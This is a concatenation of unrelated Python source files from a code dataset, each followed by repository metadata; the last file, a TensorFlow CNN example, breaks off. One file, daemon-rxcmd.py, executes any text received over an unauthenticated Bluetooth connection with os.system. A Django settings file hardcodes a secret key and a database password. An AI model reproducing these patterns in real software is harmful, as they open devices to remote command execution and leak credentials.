def __str__(self):
result = ''
for row in self.board:
for cell in row:
if (cell!=0):
result += '| ' + str(cell) + ' |'
else:
result += '| |'
result += '\n'
return result
def get_open_cell(self):
for row in range(0, 3):
for col in range(0, 3):
if(self.board[row][col]==0):
return row, col
def get_signature(self):
# return unique string to check if state has been used already
result = ''
for row in self.board:
for cell in row:
result += str(cell) if cell != 0 else ' '
return result + ':' + str(self.depth)
def get_available_moves(self):
open_row, open_col = self.get_open_cell()
available_moves = list()
# check horizontal moves
if(open_col-1) >= 0:
available_moves.append((open_row, open_col - 1))
if(open_col+1) < 3:
available_moves.append((open_row, open_col + 1))
# check vertical moves
if(open_row-1) >= 0:
available_moves.append((open_row - 1, open_col))
if(open_row+1) < 3:
available_moves.append((open_row + 1, open_col))
return available_moves
def completed(self):
return (np.array(self.board) == np.array(self._goal)).all()
def move_cell(self,row:int, col:int):
# slide the given cell's tile into the open cell (the move is assumed valid)
open_row, open_col = self.get_open_cell()
self.board[open_row][open_col] = self.board[row][col]
self.board[row][col] = 0
def clone(self):
cloned_puzzle = Puzzle()
cloned_puzzle.set_state(np.copy(self.board))
cloned_puzzle.depth = self.depth
return cloned_puzzle
def evaluate(self, evaluation_method: str = 'fair'):
if(evaluation_method=='good'):
return self._evaluate_nilsson_sequence()
elif(evaluation_method=='fair'):
return self._evaluate_manhattan()
elif(evaluation_method=='weak'):
return self._evaluate_hamming()
elif(evaluation_method=='bad'):
return self._evaluate_opposites()
def _evaluate_manhattan(self):
sum = 0
for row in range(0, 3):
for col in range(0, 3):
tile = self.board[row][col]
if(tile>0):
for m in range(0, 3):
for n in range(0, 3):
if tile == self._goal[m][n]:
sum += abs(row-m) + abs(col-n)
return sum
def _evaluate_nilsson_sequence(self):
# inspired by the answer here: https://cs.stackexchange.com/questions/1904/nilssons-sequence-score-for-8-puzzle-problem-in-a-algorithm?rq=1
# if the empty box is not in the middle, start with cost 1
total_score = 0 if self.board[1][1]==0 else 1
# add manhattan distance cost
distance_cost = self._evaluate_manhattan()
# successors
successor_cost = 0
goal_pairs = list([[1,2],[2,3],[3,5],[5,8],[8,7],[7,6],[6,4],[4,1]])
if([self.board[0][0],self.board[0][1]] not in goal_pairs): successor_cost+=1
if([self.board[0][1],self.board[0][2]] not in goal_pairs): successor_cost+=1
if([self.board[0][2],self.board[1][2]] not in goal_pairs): successor_cost+=1
if([self.board[1][2],self.board[2][2]] not in goal_pairs): successor_cost+=1
if([self.board[2][2],self.board[2][1]] not in goal_pairs): successor_cost+=1
if([self.board[2][1],self.board[2][0]] not in goal_pairs): successor_cost+=1
if([self.board[2][0],self.board[1][0]] not in goal_pairs): successor_cost+=1
return distance_cost + 3 * (total_score + 2*successor_cost)
def _evaluate_hamming(self):
sum = 0
for row in range(0, 3):
for col in range(0, 3):
tile = self.board[row][col]
if(tile!=self._goal[row][col]):
sum += 1
return sum
def _evaluate_opposites(self):
sum = 0
sum += abs(self.board[0][0] - self.board[2][2])
sum += abs(self.board[0][1] - self.board[2][1])
sum += abs(self.board[0][2] - self.board[2][0])
sum += abs(self.board[1][0] - self.board[1][2])
return abs(16-sum)
|
[
"Sam.Vanhoutte@codit.eu"
] |
Sam.Vanhoutte@codit.eu
|
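A short usage sketch of the class above; every call comes straight from the source, only the surrounding driver code is assumed:

puzzle = Puzzle()                        # scrambled by 200 random moves
print(puzzle)                            # 3x3 board, blank cell shown empty
print(puzzle.evaluate('fair'))           # Manhattan-distance heuristic
print(puzzle.evaluate('good'))           # Nilsson sequence score
row, col = puzzle.get_available_moves()[0]
puzzle.move_cell(row, col)               # slide one tile into the open cell
print(puzzle.completed())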
4db3e4c30c7da93ef32b7bb65f05b44b0b744e49
|
416ad9ba952c563b9600c040d72d4bea8c6ac926
|
/src/lstm.py
|
380ce67a2254f609e2192219a0070e0440e8661c
|
[] |
no_license
|
bokutotu/Simulate
|
3d990d75666abec8e5c07a90d8d4720137f95c7d
|
a95826127df4ffdcbbf2ccbadea8262aa84ccdd5
|
refs/heads/main
| 2023-06-21T01:04:19.079336
| 2021-07-20T13:30:54
| 2021-07-20T13:30:54
| 387,800,087
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,441
|
py
|
import numpy as np
import torch
import leapfrog
import preprocess
class LSTMLeapFrog(leapfrog.LeapFrog):
def __init__(self, sim_len, atom_num, norm,
chainlen_c, floatlen_c, chainlen_v, floatlen_v,
coord, velocity, force,
net_n, net_ca, net_c, net_o,
feature_len, name, in_channels, in_channels_o):
super().__init__(sim_len, atom_num, norm,
coord, velocity, force,
net_n, net_ca, net_c, net_o)
self.feature_len = feature_len
self.name = name
self.device = "cuda:0" if torch.cuda.is_available() else "cpu"
self.in_channels = in_channels
self.in_channels_o = in_channels_o
self.chainlen_c = chainlen_c
self.floatlen_c = floatlen_c
self.chainlen_v = chainlen_v
self.floatlen_v = floatlen_v
def before_sim(self):
self.res_coord = np.zeros((self.feature_len+self.sim_len, self.atom_num, 3), dtype=np.float32)
self.res_velocity = np.zeros((self.feature_len+self.sim_len, self.atom_num, 3), dtype=np.float32)
self.res_force = np.zeros((self.feature_len+self.sim_len, self.atom_num, 3), dtype=np.float32)
self.res_coord[0:self.feature_len] = self.coord
self.res_velocity[0:self.feature_len] = self.velocity
self.res_force[0:self.feature_len] = self.force
self.features_ca = np.zeros(
(self.sim_len + self.feature_len, self.atom_num//4+1, self.in_channels),
dtype=np.float32)
self.features_c = np.zeros(
(self.sim_len + self.feature_len, self.atom_num//4+1, self.in_channels),
dtype=np.float32)
self.features_n = np.zeros(
(self.sim_len + self.feature_len, self.atom_num//4+1, self.in_channels),
dtype=np.float32)
self.features_o = np.zeros(
(self.sim_len + self.feature_len, self.atom_num//4, self.in_channels_o),
dtype=np.float32)
# build the features for steps 0 .. feature_len-1 before the first iteration
for time in range(self.feature_len-1):
f_n, f_ca, f_c, f_o, b_n, b_ca, b_c, b_o = \
preprocess.make_single(
chainlen_c=self.chainlen_c, floatlen_c=self.floatlen_c,
chainlen_v=self.chainlen_v, floatlen_v=self.floatlen_v,
atom_num=self.atom_num,
c=self.res_coord[time], v=self.res_velocity[time],
is_use_angles=True
)
self.features_n[time] = f_n
self.features_ca[time] = f_ca
self.features_c[time] = f_c
self.features_o[time] = f_o
def simulation_step(self, time):
# compute and store the features for time - 1
f_n, f_ca, f_c, f_o, b_n, b_ca, b_c, b_o = \
preprocess.make_single(
chainlen_c=self.chainlen_c, floatlen_c=self.floatlen_c,
chainlen_v=self.chainlen_v, floatlen_v=self.floatlen_v,
atom_num=self.atom_num,
c=self.res_coord[time+self.feature_len-1],
v=self.res_velocity[time+self.feature_len-1],
is_use_angles=True
)
self.features_n[time+self.feature_len-1] = f_n
self.features_ca[time+self.feature_len-1] = f_ca
self.features_c[time+self.feature_len-1] = f_c
self.features_o[time+self.feature_len-1] = f_o
# slice out the features needed for the input
input_tensor_ca = torch.tensor(self.features_ca[time:time+self.feature_len]) \
.to(self.device)
input_tensor_c = torch.tensor(self.features_c[time:time+self.feature_len]) \
.to(self.device)
input_tensor_n = torch.tensor(self.features_n[time:time+self.feature_len]) \
.to(self.device)
input_tensor_o = torch.tensor(self.features_o[time:time+self.feature_len]) \
.to(self.device)
# reshape to the dimensions the network was trained with
# (features_len, atom_num, in_channnels) -> (atom_num, features_len, in_channnels)
input_tensor_c = input_tensor_c.transpose(0,1)
input_tensor_ca = input_tensor_ca.transpose(0,1)
input_tensor_n = input_tensor_n.transpose(0,1)
input_tensor_o = input_tensor_o.transpose(0,1)
# predict with the neural network
force_n, force_ca, force_c, force_o = \
self.pred_nn(input_tensor_n, input_tensor_ca, input_tensor_c, input_tensor_o)
# use only the last predicted step
force_ca = force_ca[::, -1, ::]
force_c = force_c[::, -1, ::]
force_n = force_n[::, -1, ::]
force_o = force_o[::, -1, ::]
force = leapfrog.rotate_force(force_n,force_ca, force_c, force_o,
b_n, b_ca, b_c, b_o, self.atom_num, self.norm)
# compute the velocities
v_now = leapfrog.cal_v_2(self.res_velocity[time+self.feature_len -1], self.mass, force)
self.res_velocity[time+self.feature_len] = v_now
# compute the coordinates
c_now = leapfrog.cal_coord(self.res_coord[time + self.feature_len - 1], v_now)
self.res_coord[time + self.feature_len] = c_now
def save(self):
np.save(self.name, self.res_coord[self.feature_len:-1:])
|
[
"mushin.hudoushin@gmail.com"
] |
mushin.hudoushin@gmail.com
|
acbabc06e4dc6b096ab6dffc2dd92e71c90c3e59
|
3a08e9facc8df83f8e8eed4859ef59ee5200aa14
|
/rough_trade_calendar/graphql.py
|
f3894ce294cb936586401b752f32f355cd2302b4
|
[
"MIT"
] |
permissive
|
craiga/rough-trade-calendar
|
c7fe9125949a7ff1ac38acf73d51765ffbed8ad4
|
175c61391a50eaa4ada3dbc062158773cf72d9c0
|
refs/heads/main
| 2021-11-11T07:50:02.808052
| 2021-08-11T13:07:16
| 2021-08-11T13:07:16
| 194,937,687
| 1
| 1
|
MIT
| 2021-11-09T08:09:42
| 2019-07-02T21:32:28
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,875
|
py
|
"""
GraphQL + Relay interface to Rough Trade Calendar data.
"""
import django_filters
import graphene
import graphene.relay
from graphene_django import DjangoObjectType
from graphene_django.filter import DjangoFilterConnectionField
from rough_trade_calendar import models
class CountConnection(graphene.Connection):
"""A connection which supports Relay's totalCount field."""
total_count = graphene.Int()
def resolve_total_count(self, *args): # pylint: disable=unused-argument
return self.length # pylint: disable=no-member
class Meta:
abstract = True
class EventFilterSet(django_filters.FilterSet):
"""Filter and order events by start_at."""
start_after = django_filters.DateTimeFilter("start_at", "gt")
start_before = django_filters.DateTimeFilter("start_at", "lt")
order_by = django_filters.OrderingFilter(fields={"start_at": "startAt"})
class Meta:
model = models.Event
fields = ["start_after", "start_before"]
class Event(DjangoObjectType):
"""An event."""
class Meta:
model = models.Event
fields = [
"id",
"name",
"description",
"url",
"image_url",
"start_at",
"location",
]
filterset_class = EventFilterSet
interfaces = [graphene.relay.Node]
connection_class = CountConnection
class Location(DjangoObjectType):
"""A location."""
class Meta:
model = models.Location
fields = ["id", "name", "timezone", "events"]
interfaces = [graphene.relay.Node]
connection_class = CountConnection
filter_fields = {"name": ["exact", "contains"]}
class Query(graphene.ObjectType):
all_locations = DjangoFilterConnectionField(Location, description="All locations.")
schema = graphene.Schema(query=Query)
|
[
"craiga@craiga.id.au"
] |
craiga@craiga.id.au
|
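A hedged sketch of how the totalCount field contributed by CountConnection can be queried through the schema above (field names follow graphene-django's camel-casing; the query string is an assumption and needs a configured Django database to actually resolve):

result = schema.execute("""
{
  allLocations(first: 5) {
    totalCount
    edges { node { name timezone } }
  }
}
""")
print(result.data["allLocations"]["totalCount"])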
1ac88f58fc4e55c54fef3bbf16f971a05570079f
|
90af0a07a800fe88902e5c8c160e39456ecf9f5b
|
/pydir/daemon-rxcmd.py
|
00f98fcc7ad708cdb8461545e3e983acadcf9667
|
[
"Apache-2.0"
] |
permissive
|
jmdahling/RxCmd
|
8fb1cdc32764947b35416a46e2a0764634784cea
|
000375e30f1cee622c188967b8de7874e982fd0d
|
refs/heads/master
| 2021-01-19T19:45:46.878305
| 2017-04-16T19:43:28
| 2017-04-16T19:43:28
| 88,442,730
| 0
| 0
| null | 2017-04-16T21:10:04
| 2017-04-16T21:10:04
| null |
UTF-8
|
Python
| false
| false
| 1,253
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2016 F Dou<programmingrobotsstudygroup@gmail.com>
# See LICENSE for details.
import bluetooth
import os
import logging
import time
from daemon import runner
class RxCmdDaemon():
def __init__(self):
self.stdin_path = '/dev/null'
# self.stdout_path = '/dev/tty'
self.stdout_path = '/home/robot/pydir/daemon.log'
self.stderr_path = '/home/robot/pydir/daemon.log'
# self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/RxCmdDaemon.pid'
self.pidfile_timeout = 5
def run(self):
while True:
server_sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
port = 1
server_sock.bind(("",port))
server_sock.listen(1)
client_sock,address = server_sock.accept()
print "Accepted connection from ",address
try:
while True:
data = client_sock.recv(1024)
print "received [%s]" % data
os.system(data)
except Exception as e:
logging.exception(e)
rxCmdDaemon = RxCmdDaemon()
daemon_runner = runner.DaemonRunner(rxCmdDaemon)
daemon_runner.do_action()
|
[
"javatechs@gmail.com"
] |
javatechs@gmail.com
|
35a7b100287d182cc18bd381c35f0962b21d2a4c
|
481f1f66071fc9b9eb8ea88e4df4e5186d99cdab
|
/cs540_project/settings.py
|
ed9c788dfa04191afa583308024095f3d3d778dc
|
[] |
no_license
|
tso2381637/cs540_project
|
3cc1cee12095377c16046f666a4ab077bcf08508
|
1803d0ce87465032c8921bec64f0e0dd82c82cd4
|
refs/heads/master
| 2021-02-11T17:44:48.363496
| 2020-03-13T04:31:10
| 2020-03-13T04:31:10
| 244,514,913
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,390
|
py
|
"""
Django settings for cs540_project project.
Generated by 'django-admin startproject' using Django 2.2.10.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ')4@vhi%0rq(h@=uwzwb1y&@am=kob=))kvat5xqqw9l0jne(##'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'home.apps.HomeConfig',
'rest_framework',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'cs540_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'cs540_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'crash_data',
'USER': 'eason',
'PASSWORD': 'pa55word',
'HOST': '34.83.53.44', # Or an IP Address that your DB is hosted on
'PORT': '3306',
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
DATETIME_FORMAT = '%m/%d/%Y %I:%M'
|
[
"tso2381637@gmail.com"
] |
tso2381637@gmail.com
|
fb9ba2d39a850faee8978b4ef1f593af35a95224
|
fd71857adc56fe72bbb3c302a1013e8de8511c50
|
/bitcoin/utxo.py
|
b95630c872cd8cc9007f834a233bda67c0d03e98
|
[] |
no_license
|
AbhishekAshokDubey/blockchain_python
|
a209b5f23e16c5e8b1739a57eecfd95952ed52ae
|
e64c72420bfe746a87f5255f94a8f4c1cf1a8789
|
refs/heads/master
| 2020-03-25T14:36:47.942295
| 2018-08-07T11:29:50
| 2018-08-07T11:29:50
| 143,863,591
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,156
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 27 15:44:15 2018
@author: ADubey4
"""
"""Done"""
# http://gerg.ca/blog/post/2012/python-comparison/
# https://docs.python.org/3.5/library/functools.html#functools.total_ordering
from functools import total_ordering
import copy
@total_ordering
class UTXO :
@staticmethod
def cmp(a, b):
return (a > b) - (a < b)
def __init__(self, tx_hash, index):
self.tx_hash = copy.copy(tx_hash)
self.index = index
def equals(self, other_utxo=None):
return ((self.tx_hash == other_utxo.tx_hash) and (self.index == other_utxo.index))
def get_hash_code(self):
hash_code = 17 + self.index
hash_code = hash_code * 31 + hash(self.tx_hash)
return hash_code
## everything below: the way to implement a comparable in python
def __cmp__(self, other_utxo):
other_hashcode = other_utxo.tx_hash
other_index = other_utxo.index
if(other_index > self.index):
return -1
elif (other_index < self.index):
return 1
else:
if len(other_hashcode) > len(self.tx_hash):
return -1
elif len(other_hashcode) < len(self.tx_hash):
return 1
else:
return self.cmp(self.tx_hash, other_hashcode)
# __cmp__ was removed in Python 3.x, hence we need to implement something more
def __eq__(self, other):
return self.__cmp__(other) == 0
def __lt__(self, other):
return self.__cmp__(other) < 0
# required only when we use the object as dict key or in set
# as they Data structures uses hash internally
# def __hash__(self):
# return self.get_hash_code()
# below code is not required because of @total_ordering, else we would need everything below
# def __ne__(self, other):
# return self.__cmp__(other) != 0
# def __gt__(self, other):
# return self.__cmp__(other) > 0
# def __ge__(self, other):
# return self.__cmp__(other) >= 0
# def __le__(self, other):
# return self.__cmp__(other) <= 0
|
[
"adubey4@slb.com"
] |
adubey4@slb.com
|
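A quick sketch of what the @total_ordering setup above buys (the hash values are made-up placeholders):

a = UTXO(b"aa" * 16, 0)
b = UTXO(b"aa" * 16, 1)
c = UTXO(b"bb" * 16, 1)
assert a < b   # a lower index sorts first
assert b < c   # equal index and hash length: ordered by hash bytes
print([u.index for u in sorted([c, b, a])])   # [0, 1, 1], via __lt__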
15959d749cf76018d3d00dfa9cafa9d7699348b9
|
7e820bcff319b61b0905f6839743155a450d3cfb
|
/data/scripts/xyf.py
|
57902dd0f473723f1289508d0ca1306bffb99c78
|
[] |
no_license
|
ShadowLugia650/pokemon-tcg
|
6636a12f15ab5f0fe2b4da85056d844651ec6f33
|
333df6e0303acac361140501b4f98f9c45296435
|
refs/heads/master
| 2022-11-19T23:02:12.657279
| 2020-06-28T04:31:59
| 2020-06-28T04:31:59
| 257,483,793
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 269
|
py
|
from data.scripts._util import check_energy_cost
def scratch(attacker, defender):
check_energy_cost(attacker, 1)
defender.take_damage(10, attacker)
def tailsmack(attacker, defender):
check_energy_cost(attacker, 2)
defender.take_damage(20, attacker)
|
[
"mkwoo@wisc.edu"
] |
mkwoo@wisc.edu
|
5b2cb107207f28aa4fb223e5d981c7c6eb002b41
|
8d6dc6024e8aca3ab1e11514f9c36911e5225df2
|
/004_Homework/viking_loto.py
|
7d5f868e4d9876867d9e0be4d12a83812dad7f71
|
[] |
no_license
|
JanaSed/Homeworks
|
16bfeecd35eeb853c9e72108c3fb5e5419bb8f8f
|
efe0de7174385563358c48f5d67da5e05d686e66
|
refs/heads/master
| 2023-07-04T21:54:21.279882
| 2021-08-16T17:52:28
| 2021-08-16T17:52:28
| 379,962,510
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 113
|
py
|
import random
print(random.sample(range(48), 6))
print(random.sample(range(1, 5), 1))
|
[
"j.sedasheva@gmail.com"
] |
j.sedasheva@gmail.com
|
a747f23ed4a39749024d5edcb173888590294a8f
|
fc220ec70c38972e97a9b549c14262a5ed1aa6a9
|
/mac/__init__.py
|
8ea3bdb9386d6db6e470175f089de02e8886e1be
|
[] |
no_license
|
adrienpaysant/hashesAndMACs
|
adbb1ab869a4a2d14a002ab8dae340473c33f9af
|
0454ed8499aa82d06ea713c66bc5d58628249264
|
refs/heads/main
| 2023-04-17T05:47:52.372755
| 2021-04-29T13:48:32
| 2021-04-29T13:48:32
| 358,198,378
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 236
|
py
|
from .communication import send_message_digest, get_message_digest, get_message, get_digest, send_message, send_digest
__all__ = [ 'send_message_digest', 'get_message_digest', 'get_message', 'get_digest', 'send_message', 'send_digest']
|
[
"edouard.goffinet@he-arc.ch"
] |
edouard.goffinet@he-arc.ch
|
4e6c7d73d626383ba1cf1342cec8ceeefd7552ac
|
e6cc19f280d737e4c37ad499c9c5370ec9079a1f
|
/project_euler_solutions/problem_9.py
|
e18867f8541e3b78ce778214acc2cc1a408672a8
|
[] |
no_license
|
jdgsmallwood/ProjectEuler
|
f705611b903d6615894b60c087ee2e74088715c2
|
f310421ca82046fdf18f606e8752ed9ce6c8be36
|
refs/heads/master
| 2023-01-07T16:08:46.165465
| 2020-11-14T00:57:01
| 2020-11-14T00:57:01
| 111,932,708
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 417
|
py
|
target = 1000
#We're assuming without loss of generality that a <= b; c is then fixed by c = 1000 - a - b
for a in range(1,1000):
for b in range(a,1000):
c = 1000 - a - b
if a**2 + b**2 == c**2:
if a + b + c == target:
print('A: %f' % a)
print('B: %f'% b)
print("C: %f" % c)
print(a*b*c)
break
# I think the answer is 31875000
|
[
"justin.d.smallwood@gmail.com"
] |
justin.d.smallwood@gmail.com
|
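The commented guess at the end checks out: the Pythagorean triple summing to 1000 is (200, 375, 425), which a standalone snippet confirms:

a, b, c = 200, 375, 425
assert a + b + c == 1000
assert a**2 + b**2 == c**2   # 40000 + 140625 == 180625
print(a * b * c)             # 31875000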
8a8680338eb791a54e04854473d5d7158ca44726
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/pytype/pytype/tools/merge_pyi/test_data/var_annot.comment.py
|
8d3907c0a79e522e7a66e1587e8a8ca132b76a38
|
[] |
no_license
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:fbf532cb3bc3376967d6a665559e5b50273ee6371ee9080fcc2f2d7e3592c2eb
size 156
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
1d4206c56fddce6446aff8d1c579022e0ed24186
|
b3a79effcc09df60100dd28d333b60be99ed75a2
|
/app/salaries/migrations/0002_salary.py
|
1601ad14a7d51cdf8bfb44c9de34fd1f64744256
|
[] |
no_license
|
claytonrm/upsalary-django-project
|
b4d4e021b280b72bf50b4d08e77b940787622d74
|
6d9de78c189d78a5ce237062a54256b28b82bd60
|
refs/heads/master
| 2023-08-03T14:42:36.020401
| 2020-07-09T14:37:09
| 2020-07-09T14:37:09
| 265,437,864
| 0
| 0
| null | 2021-09-22T19:02:53
| 2020-05-20T03:19:58
|
Python
|
UTF-8
|
Python
| false
| false
| 678
|
py
|
# Generated by Django 3.0.6 on 2020-05-20 18:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('salaries', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Salary',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('amount', models.DecimalField(decimal_places=2, max_digits=19)),
('taxes', models.DecimalField(decimal_places=2, max_digits=19)),
('received_at', models.DateTimeField(editable=False)),
],
),
]
|
[
"claytonrmendonca@gmail.com"
] |
claytonrmendonca@gmail.com
|
ed56edac7dcdd5606246aad436c9d852a3f3f40f
|
786f34fc2fea4f764d083b2bb3fd75222dfbbac1
|
/jobsPortal/jobsPortal/urls.py
|
df7cc52aa22d588c3e134c6f19a0b5e4a7a1e052
|
[] |
no_license
|
shivendra04/DjangoProjects
|
6c4ddc58588c7033afa7a1f5a299e33b1afb3897
|
d3a190fd47582190f2ad41d8dc4b30b7841cf679
|
refs/heads/master
| 2022-12-20T00:01:22.524044
| 2020-09-22T08:05:43
| 2020-09-22T08:05:43
| 297,578,265
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 994
|
py
|
"""jobsPortal URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from jobsApp import views
urlpatterns = [
path('admin/', admin.site.urls),
path('home/', views.home),
path('home/hydjobs/', views.hydjob),
path('home/punejobs/', views.punejob),
path('home/banglorejobs/', views.banglorejob),
path('home/chennaijobs/', views.chennaijob),
]
|
[
"52535417+shivendra04@users.noreply.github.com"
] |
52535417+shivendra04@users.noreply.github.com
|
419b271226298b03583d193a10914df6729aeb1c
|
137e4fc41341350550106ce897eba9617e34a4d5
|
/example_feedback/urls.py
|
4a76a819aa393aba1b5d28aa927a76b6b5be0963
|
[] |
no_license
|
javierLiarte/django-simple-feedback-1
|
888425d288965ad8ee581d91be12af28ee87d14e
|
1aca0df0b9a1773624bfb3d3ba6aa8696d8d239b
|
refs/heads/master
| 2021-01-17T06:56:47.592413
| 2014-10-10T15:42:58
| 2014-10-10T15:42:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 825
|
py
|
from django.conf.urls.defaults import patterns, include, url
from django.views.generic.simple import direct_to_template
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url('^$', direct_to_template, {'template': 'base.html'}),
url(r'^feedback/', include('feedback.urls')),
(r'^accounts/login/$', 'django.contrib.auth.views.login'),
# Examples:
# url(r'^$', 'example_feedback.views.home', name='home'),
# url(r'^example_feedback/', include('example_feedback.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
)
|
[
"nicolas@kwyk.fr"
] |
nicolas@kwyk.fr
|
1a2f1f8498afde855fe2f89df29272d73550da39
|
100d4ef3ac2d288b45430650730eaff1a0e5fb05
|
/Backend/process.py
|
eaf6e61e7206b9b33d40f2d9ed2f7f4695aeb092
|
[] |
no_license
|
billbai0102/SGMT
|
107782b862031deaca1ac91e4b225b9199e4eab2
|
c8303effc8dfada9e5381b09e17e350c5ca8c094
|
refs/heads/main
| 2022-12-26T17:35:57.738188
| 2020-10-07T14:37:38
| 2020-10-07T14:37:38
| 300,917,335
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 399
|
py
|
import cv2
import torch
import numpy as np
def preprocess_mri(image):
image = cv2.resize(image, (256, 256))
image = torch.tensor(image.astype(np.float32))
image = image.unsqueeze(0)
image = image.permute(0, 3, 1, 2)
return image
def postprocess_mask(mask):
mask = mask.detach()
mask = mask.cpu()
mask = mask.numpy()[0, 0, :, :]  # drop batch and channel dims, leaving a 2-D grayscale mask
return mask
|
[
"31229051+billbai0102@users.noreply.github.com"
] |
31229051+billbai0102@users.noreply.github.com
|
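A small usage sketch of the two helpers above; the 512x512 input is an arbitrary assumption, since cv2.resize rescales any H x W x 3 image to 256x256:

import numpy as np
import torch

img = np.zeros((512, 512, 3), dtype=np.uint8)   # placeholder MRI slice
x = preprocess_mri(img)
print(x.shape)                                  # torch.Size([1, 3, 256, 256])
mask = torch.zeros((1, 1, 256, 256), requires_grad=True)
print(postprocess_mask(mask).shape)             # (256, 256)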
0efae463197cf4b67c08549dc4459158bc1c5d11
|
a3c7c11c607800155457ea1f886e2d84eadd9610
|
/examples/3_NeuralNetworks/convolutional_network.py
|
17aa1d84f64834e38d5523b130d66d3e697d1ee0
|
[
"MIT"
] |
permissive
|
353622088/CapsNet
|
eddba478143bd092ce27bd49dbb65c63d80824e4
|
04408978dfccd9a6545fc250648fd2f600974a95
|
refs/heads/master
| 2021-08-28T02:22:56.958370
| 2017-12-11T03:03:52
| 2017-12-11T03:03:52
| 112,295,252
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,934
|
py
|
""" Convolutional Neural Network.
Build and train a convolutional neural network with TensorFlow.
This example is using the MNIST database of handwritten digits
(http://yann.lecun.com/exdb/mnist/)
This example is using TensorFlow layers API, see 'convolutional_network_raw'
example for a raw implementation with variables.
Author: Aymeric Damien
Project: https://github.com/aymericdamien/TensorFlow-Examples/
"""
from __future__ import division, print_function, absolute_import
# Import MNIST data
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("../tmp/data/", one_hot=False)
import tensorflow as tf
# Training Parameters
learning_rate = 0.001
num_steps = 2000
batch_size = 128
# Network Parameters
num_input = 784 # MNIST data input (img shape: 28*28)
num_classes = 10 # MNIST total classes (0-9 digits)
